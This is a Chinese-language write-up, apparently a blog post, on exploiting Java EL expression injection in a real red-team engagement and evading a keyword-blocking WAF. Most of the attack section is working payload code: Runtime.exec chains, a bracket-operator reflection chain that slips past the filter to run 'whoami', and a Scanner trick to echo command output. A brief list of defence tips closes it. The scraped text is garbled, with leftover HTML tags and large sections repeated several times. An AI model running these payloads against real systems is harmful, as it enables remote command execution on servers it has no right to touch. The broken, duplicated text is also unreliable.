EL表达式注入漏洞实战绕过技术详解<\/h1>

前言<\/h2>
本文基于HVV实战中遇到的EL表达式注入漏洞及WAF绕过案例，详细记录从发现到最终绕过的完整过程，重点分析EL表达式语法特性、常见RCE payload构造方法以及针对严格WAF的极限绕过技术。<\/p>

EL表达式基础<\/h2>

EL语法概述<\/h3>
EL（Expression Language）表达式格式统一为 `${expression}<\/code>，提供在JSP环境中简化数据访问的表达式语言。<\/p>`

运算符系统<\/h3>

点运算符（.）<\/strong>：用于访问对象属性和方法，如 ${user.name}<\/code><\/li>
方括号运算符（[]）<\/strong>：功能更强大的替代运算符，支持：

访问包含特殊字符的属性名：${user["My-Name"]}<\/code>（处理含.<\/code>或-<\/code>的属性名）<\/li>
动态取值功能：${sessionScope.user[data]}<\/code>（其中data为变量）<\/li>
<\/ul>
<\/li>
<\/ul>
隐式对象体系<\/h3>
JSP EL定义了一套完整的隐式对象，用于访问各种上下文数据：<\/p>



对象类别<\/th>
对象名称<\/th>
等效Java代码<\/th>
功能描述<\/th>
<\/tr>
<\/thead>


请求参数<\/td>
param<\/td>
request.getParameter(name)<\/code><\/td>
获取单个请求参数值<\/td>
<\/tr>

<\/td>
paramValues<\/td>
request.getParameterValues(name)<\/code><\/td>
获取请求参数值数组<\/td>
<\/tr>

HTTP头<\/td>
header<\/td>
request.getHeader(name)<\/code><\/td>
获取单个请求头值<\/td>
<\/tr>

<\/td>
headerValues<\/td>
request.getHeaders(name)<\/code><\/td>
获取请求头值数组<\/td>
<\/tr>

Cookie<\/td>
cookie<\/td>
request.getCookies()<\/code><\/td>
获取cookie对象<\/td>
<\/tr>

初始化参数<\/td>
initParam<\/td>
servletContext.getInitParameter(name)<\/code><\/td>
获取上下文初始化参数<\/td>
<\/tr>

作用域对象<\/td>
pageScope<\/td>
pageContext.getAttribute(name)<\/code><\/td>
页面作用域属性访问<\/td>
<\/tr>

<\/td>
requestScope<\/td>
request.getAttribute(name)<\/code><\/td>
请求作用域属性访问<\/td>
<\/tr>

<\/td>
sessionScope<\/td>
session.getAttribute(name)<\/code><\/td>
会话作用域属性访问<\/td>
<\/tr>

<\/td>
applicationScope<\/td>
application.getAttribute(name)<\/code><\/td>
应用作用域属性访问<\/td>
<\/tr>

上下文对象<\/td>
pageContext<\/td>
-<\/td>
访问JSP隐式对象（请求、响应、会话等）<\/td>
<\/tr>
<\/tbody>
<\/table>
常见RCE payload构造原理<\/h2>
核心思路<\/h3>
通过EL表达式访问Java类和方法，最终实现命令执行：<\/p>

获取Class对象：通过内置对象或字面量获取类引用<\/li>
反射调用：通过反射机制获取方法和调用方法<\/li>
命令执行：调用Runtime等类的执行方法<\/li>
<\/ol>
传统payload示例<\/h3>
${Runtime.getRuntime().exec("calc")}
${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc')}
<\/code><\/pre>
实战WAF绕过技术详解<\/h2>
初始探测<\/h3>

发现参数输入直接回显，初步测试XSS无果<\/li>
尝试数学表达式 1+1<\/code> 未计算，怀疑表达式执行环境<\/li>
确认EL表达式执行环境：${7*7}<\/code> 返回49，确认漏洞存在<\/li>
<\/ol>
WAF拦截分析<\/h3>
传统payload中的关键字全部被拦截：<\/p>

Runtime<\/code>, Class<\/code>, getRuntime<\/code>, exec<\/code>, getMethod<\/code>, invoke<\/code>等<\/li>
大小写变换等简单绕过手法无效<\/li>
<\/ul>
关键绕过技术突破<\/h3>
第一步：类获取绕过<\/h4>
利用[]<\/code>运算符替代点运算符，避免关键字检测：<\/p>
${''<\/span>["class"<\/span>]}
<\/span><\/span><\/code><\/pre>成功获取Class对象，绕过class<\/code>关键字检测<\/p>
第二步：反射方法调用<\/h4>
${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>)}
<\/span><\/span><\/code><\/pre>获取Runtime类引用，绕过forName<\/code>关键字检测<\/p>
第三步：方法获取与调用<\/h4>
${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null)}
<\/span><\/span><\/code><\/pre>获取getRuntime方法，注意此处必须保留null<\/code>参数<\/p>
第四步：实例化对象获取<\/h4>
${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null).<\/span>invoke(null)}
<\/span><\/span><\/code><\/pre>成功获取Runtime实例，此处发现必须保留null<\/code>参数，否则报错<\/p>
命令执行与回显处理<\/h3>
命令执行payload<\/h4>
${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null).<\/span>invoke(null).<\/span>exec("whoami"<\/span>)}
<\/span><\/span><\/code><\/pre>但无回显显示，需要获取输出<\/p>
回显解决方案<\/h4>
使用Scanner类读取命令执行结果：<\/p>
${''<\/span>["class"<\/span>].<\/span>forName("java.util.Scanner"<\/span>).<\/span>getConstructor(''<\/span>["class"<\/span>].<\/span>forName("java.io.InputStream"<\/span>)).<\/span>newInstance(''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null).<\/span>invoke(null).<\/span>exec("whoami"<\/span>).<\/span>getInputStream()).<\/span>next()}
<\/span><\/span><\/code><\/pre>完整流程：<\/p>

执行命令获取Process对象<\/li>
获取命令执行结果的InputStream<\/li>
使用Scanner构造函数接收InputStream<\/li>
调用Scanner的next()方法读取输出内容<\/li>
<\/ol>
总结与技术要点<\/h2>
核心绕过技术<\/h3>

运算符替换<\/strong>：使用[]<\/code>替代点运算符，有效避开关键字检测<\/li>
参数完整性<\/strong>：保持方法调用时参数列表的完整性（如null<\/code>参数必须保留）<\/li>
反射链构造<\/strong>：通过完整的反射调用链实现功能，避免直接使用关键字<\/li>
<\/ol>
防御建议<\/h3>

输入过滤：对EL表达式特殊字符和关键字进行过滤<\/li>
沙箱环境：限制EL表达式的执行环境，禁用危险类和方法的访问<\/li>
上下文检查：确保EL表达式仅在预期的安全上下文中执行<\/li>
<\/ol>
学习价值<\/h3>
本案例展示了：<\/p>

EL表达式注入的完整利用链<\/li>
针对严格WAF的渐进式绕过方法<\/li>
Java反射机制在漏洞利用中的灵活应用<\/li>
回显获取的多种技术方案<\/li>
<\/ul>
通过此实战案例，可深入理解EL表达式注入的原理和防御方法，提升代码安全审计和漏洞挖掘能力。<\/p>

对象类别<\/th>	对象名称<\/th>	等效Java代码<\/th>	功能描述<\/th> <\/tr> <\/thead>
请求参数<\/td>	param<\/td>	`request.getParameter(name)<\/code><\/td>`	获取单个请求参数值<\/td> <\/tr>
<\/td>	paramValues<\/td>	`request.getParameterValues(name)<\/code><\/td>`	获取请求参数值数组<\/td> <\/tr>
HTTP头<\/td>	header<\/td>	`request.getHeader(name)<\/code><\/td>`	获取单个请求头值<\/td> <\/tr>
<\/td>	headerValues<\/td>	`request.getHeaders(name)<\/code><\/td>`	获取请求头值数组<\/td> <\/tr>
Cookie<\/td>	cookie<\/td>	`request.getCookies()<\/code><\/td>`	获取cookie对象<\/td> <\/tr>
初始化参数<\/td>	initParam<\/td>	`servletContext.getInitParameter(name)<\/code><\/td>`	获取上下文初始化参数<\/td> <\/tr>
作用域对象<\/td>	pageScope<\/td>	`pageContext.getAttribute(name)<\/code><\/td>`	页面作用域属性访问<\/td> <\/tr>
<\/td>	requestScope<\/td>	`request.getAttribute(name)<\/code><\/td>`	请求作用域属性访问<\/td> <\/tr>
<\/td>	sessionScope<\/td>	`session.getAttribute(name)<\/code><\/td>`	会话作用域属性访问<\/td> <\/tr>
<\/td>	applicationScope<\/td>	`application.getAttribute(name)<\/code><\/td>`	应用作用域属性访问<\/td> <\/tr>
上下文对象<\/td>	pageContext<\/td>	-<\/td>	访问JSP隐式对象（请求、响应、会话等）<\/td> <\/tr> <\/tbody> <\/table> 常见RCE payload构造原理<\/h2> 核心思路<\/h3> 通过EL表达式访问Java类和方法，最终实现命令执行：<\/p> 获取Class对象：通过内置对象或字面量获取类引用<\/li> 反射调用：通过反射机制获取方法和调用方法<\/li> 命令执行：调用Runtime等类的执行方法<\/li> <\/ol> 传统payload示例<\/h3> ${Runtime.getRuntime().exec("calc")} ${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc')} <\/code><\/pre> 实战WAF绕过技术详解<\/h2> 初始探测<\/h3> 发现参数输入直接回显，初步测试XSS无果<\/li> 尝试数学表达式 1+1<\/code> 未计算，怀疑表达式执行环境<\/li> 确认EL表达式执行环境：${7*7}<\/code> 返回49，确认漏洞存在<\/li> <\/ol> WAF拦截分析<\/h3> 传统payload中的关键字全部被拦截：<\/p> Runtime<\/code>, Class<\/code>, getRuntime<\/code>, exec<\/code>, getMethod<\/code>, invoke<\/code>等<\/li> 大小写变换等简单绕过手法无效<\/li> <\/ul> 关键绕过技术突破<\/h3> 第一步：类获取绕过<\/h4> 利用[]<\/code>运算符替代点运算符，避免关键字检测：<\/p> ${''<\/span>["class"<\/span>]} <\/span><\/span><\/code><\/pre>成功获取Class对象，绕过class<\/code>关键字检测<\/p> 第二步：反射方法调用<\/h4> ${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>)} <\/span><\/span><\/code><\/pre>获取Runtime类引用，绕过forName<\/code>关键字检测<\/p> 第三步：方法获取与调用<\/h4> ${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null)} <\/span><\/span><\/code><\/pre>获取getRuntime方法，注意此处必须保留null<\/code>参数<\/p> 第四步：实例化对象获取<\/h4> ${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null).<\/span>invoke(null)} <\/span><\/span><\/code><\/pre>成功获取Runtime实例，此处发现必须保留null<\/code>参数，否则报错<\/p> 命令执行与回显处理<\/h3> 命令执行payload<\/h4> ${''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null).<\/span>invoke(null).<\/span>exec("whoami"<\/span>)} <\/span><\/span><\/code><\/pre>但无回显显示，需要获取输出<\/p> 回显解决方案<\/h4> 使用Scanner类读取命令执行结果：<\/p> ${''<\/span>["class"<\/span>].<\/span>forName("java.util.Scanner"<\/span>).<\/span>getConstructor(''<\/span>["class"<\/span>].<\/span>forName("java.io.InputStream"<\/span>)).<\/span>newInstance(''<\/span>["class"<\/span>].<\/span>forName("java.lang.Runtime"<\/span>).<\/span>getMethod("getRuntime"<\/span>,<\/span>null).<\/span>invoke(null).<\/span>exec("whoami"<\/span>).<\/span>getInputStream()).<\/span>next()} <\/span><\/span><\/code><\/pre>完整流程：<\/p> 执行命令获取Process对象<\/li> 获取命令执行结果的InputStream<\/li> 使用Scanner构造函数接收InputStream<\/li> 调用Scanner的next()方法读取输出内容<\/li> <\/ol> 总结与技术要点<\/h2> 核心绕过技术<\/h3> 运算符替换<\/strong>：使用[]<\/code>替代点运算符，有效避开关键字检测<\/li> 参数完整性<\/strong>：保持方法调用时参数列表的完整性（如null<\/code>参数必须保留）<\/li> 反射链构造<\/strong>：通过完整的反射调用链实现功能，避免直接使用关键字<\/li> <\/ol> 防御建议<\/h3> 输入过滤：对EL表达式特殊字符和关键字进行过滤<\/li> 沙箱环境：限制EL表达式的执行环境，禁用危险类和方法的访问<\/li> 上下文检查：确保EL表达式仅在预期的安全上下文中执行<\/li> <\/ol> 学习价值<\/h3> 本案例展示了：<\/p> EL表达式注入的完整利用链<\/li> 针对严格WAF的渐进式绕过方法<\/li> Java反射机制在漏洞利用中的灵活应用<\/li> 回显获取的多种技术方案<\/li> <\/ul> 通过此实战案例，可深入理解EL表达式注入的原理和防御方法，提升代码安全审计和漏洞挖掘能力。<\/p>

EL表达式注入漏洞实战绕过技术详解<\/h1>

前言<\/h2> 本文基于HVV实战中遇到的EL表达式注入漏洞及WAF绕过案例，详细记录从发现到最终绕过的完整过程，重点分析EL表达式语法特性、常见RCE payload构造方法以及针对严格WAF的极限绕过技术。<\/p>

EL表达式基础<\/h2>

EL语法概述<\/h3> EL（Expression Language）表达式格式统一为 ${expression}<\/code>，提供在JSP环境中简化数据访问的表达式语言。<\/p>

常见RCE payload构造原理<\/h2>

实战WAF绕过技术详解<\/h2>

关键绕过技术突破<\/h3>

总结与技术要点<\/h2>

前言<\/h2>
本文基于HVV实战中遇到的EL表达式注入漏洞及WAF绕过案例，详细记录从发现到最终绕过的完整过程，重点分析EL表达式语法特性、常见RCE payload构造方法以及针对严格WAF的极限绕过技术。<\/p>

EL语法概述<\/h3>
EL（Expression Language）表达式格式统一为 `${expression}<\/code>，提供在JSP环境中简化数据访问的表达式语言。<\/p>`